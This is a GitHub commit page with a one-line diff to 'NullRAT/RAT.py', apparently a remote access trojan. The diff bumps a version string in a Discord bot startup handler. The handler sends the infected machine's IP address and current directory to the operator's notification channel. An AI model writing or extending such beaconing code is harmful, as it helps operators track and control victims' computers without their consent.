We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 57f986d commit eff221fCopy full SHA for eff221f
NullRAT/RAT.py
@@ -17,7 +17,7 @@
17
@client.event
18
async def on_ready():
19
await client.get_channel(notification_channel).send(
20
- embed=Embed(title = f"NullRAT v7.5 started on {IP()}\nCurrently present in {original_dir}")
+ embed=Embed(title = f"NullRAT v8.0 started on {IP()}\nCurrently present in {original_dir}")
21
)
22
23
# Intelligence Gathering #
0 commit comments